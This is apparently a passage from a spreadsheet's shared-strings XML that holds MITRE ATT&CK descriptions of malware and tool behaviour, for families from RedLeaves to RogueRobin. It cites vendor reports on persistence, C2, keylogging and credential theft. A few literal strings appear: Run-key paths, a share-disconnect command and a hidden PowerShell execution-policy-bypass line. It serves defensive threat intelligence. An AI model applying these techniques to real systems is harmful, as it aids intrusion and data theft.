    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can capture screenshots.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about network parameters.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate drives and Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about the logged on user both locally and for Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can receive and execute commands with cmd.exe. It can also provide a reverse shell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to find credentials in the Windows Registry.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can decrypt strings with a key either stored in the Registry or hardcoded in the code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can download files from C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use control-flow flattening or the commercially available .NET Reactor for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can extract and execute PowerShell scripts from C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) leveraged several compromised universities as proxies to obscure its origin.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) contains a keylogger.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to modify remote Registry information.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform uses Extended Attributes to store encrypted executables.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use ICMP to communicate between infected computers.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use Windows admin shares to move laterally.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can capture data from the system’s microphone.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for UAC bypassing.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) steals and modifies data from the clipboard.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can search for files on the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can upload and download files to and from the victim’s machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for keylogging.(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has full control of the Registry, including the ability to modify it.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses RC4 and base64 to obfuscate data, including Registry entries and file paths.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command to hide itself through injecting into another process.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can add itself to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) takes automated screenshots of the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) searches for Sandboxie and VMware on the system.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can access a system’s webcam and take pictures.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can launch a remote command line to execute commands on the victim’s machine.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) has a command to capture active windows on the machine and retrieve window titles.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) encrypts and adds all gathered browser data into files for upload to C2.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) collects text from the clipboard.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) decrypts the configuration data using XOR with 25-character keys.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) performs exfiltration over [BITSAdmin](https://attack.mitre.org/software/S0190), which is also used for the C2 channel.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) searches for files on the system. (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) gathers and exfiltrates keystrokes from the machine.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) obfuscates its configuration data with XOR.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes Run Registry keys in the HKLM hive as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes scheduled tasks as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) takes screenshots of windows of interest.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses AutoIt and VBS scripts throughout its execution process.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses [BITSAdmin](https://attack.mitre.org/software/S0190) to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) silently executes received commands with cmd.exe.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) executes received commands with wmic.exe (for WMI commands). (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) achieves persistence using Userinit by adding the Registry key &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt;.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) copies a file over to the remote system before execution.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new schedule task on the remote system(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new service on the remote system.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can enumerate files and directories on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can upload and download files to and from a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can use Msiexec to install a service.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can take screenshots on a compromised host.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using DNS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a package that collects documents from any inserted USB sticks.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can add or remove applications or ports on the Windows firewall or disable it entirely.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can perform DLL injection.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of listing contents of folders on the victim. [Remsec](https://attack.mitre.org/software/S0125) also searches for custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a keylogger component.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of users.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using SMTP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>The [Remsec](https://attack.mitre.org/software/S0125) loader implements itself with the name Security Support Provider, a legitimate Windows function. Various [Remsec](https://attack.mitre.org/software/S0125) .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. [Remsec](https://attack.mitre.org/software/S0125) also disguised malicious modules using similar filenames as custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin that can perform ARP scanning as well as port scanning.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using ICMP, TCP, and UDP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>Some data in [Remsec](https://attack.mitre.org/software/S0125) is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) harvests plain-text credentials as a password filter registered on domain controllers.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a process list from the victim.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can ping or traceroute a remote host.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) schedules the execution one of its modules by creating a new scheduler task.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can dump the SAM database.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to detect active drivers of some security products.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of active connections and open ports.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about the current user.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) is used to poison name services to gather hashes and credentials from systems within a local network.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) captures hashes and credentials that are sent to the system after the name services have been poisoned.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for microphone interception.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) used blogpost.com as its primary command and control server during a campaign.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the [Forfiles](https://attack.mitre.org/software/S0193) utility to execute commands on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to upload and download files.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for keylogging.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for credential harvesting.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the PowerShell command &lt;code&gt;Reflection.Assembly&lt;/code&gt; to load itself into memory to aid in execution.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) creates a Registry key at &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; to survive a system reboot.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin to perform RDP access.(Citation: Cylance Shaheen Nov 2018)
</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) schedules tasks to run malicious scripts at different intervals.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for screen capture.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses Base64 to encode information sent to the C2 server.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the CPU information, OS information, and system language.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the IP address and MAC address from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) gathers the username from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to access the webcam.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses cmd.exe to execute commands and run scripts on the victim's machine.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as &lt;code&gt;C:\ProgramData\Initech\Initech.exe&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has created a new registry entry at &lt;code&gt;HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics&lt;/code&gt; with a value of &lt;code&gt;C:\ProgramData\Initech\Initech.exe /run&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can delete files specified by the C2.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. [Rising Sun](https://attack.mitre.org/software/S0448) can enumerate the compilation timestamp of Windows executable files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can clear process memory by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging LoadLibrary() and GetProcAddress().(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) is encrypted using RC4.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect the computer name, operating system, and other native system information.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP for command and control.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) executed commands using cmd.exe.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for an RSA encryption key and then perform its encryption process on the system files.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for Windows services that are associated with antivirus software on the system and kill the process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) deletes shadow copies to ensure that all the data cannot be restored easily.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) disconnects all network shares from the computer with the command &lt;code&gt;net use * /DELETE /Y&lt;/code&gt;.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) stops 181 Windows services on the system before beginning the encryption process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) uses cmd.exe on the victim's computer.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has used Google Drive as a Command and Control channel. (Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) decodes an embedded executable using base64 and decompresses it.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) can save a new file to the system from the C2 server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>The PowerShell script with the [RogueRobin](https://attack.mitre.org/software/S0270) payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.(Citation: Unit 42 DarkHydrus July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses a command prompt to run a PowerShell script from Excel.(Citation: Unit 42 DarkHydrus July 2018) To assist in establishing persistence, [RogueRobin](https://attack.mitre.org/software/S0270) creates &lt;code&gt;%APPDATA%\OneDrive.bat&lt;/code&gt; and saves the following string to it:&lt;code&gt;powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”&lt;/code&gt;.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses regsvr32.exe to run a .sct file for execution.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has a command named &lt;code&gt;$screenshot&lt;/code&gt; that may be responsible for taking screenshots of the victim machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) enumerates running processes to search for Wireshark and Windows Sysinternals suite.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
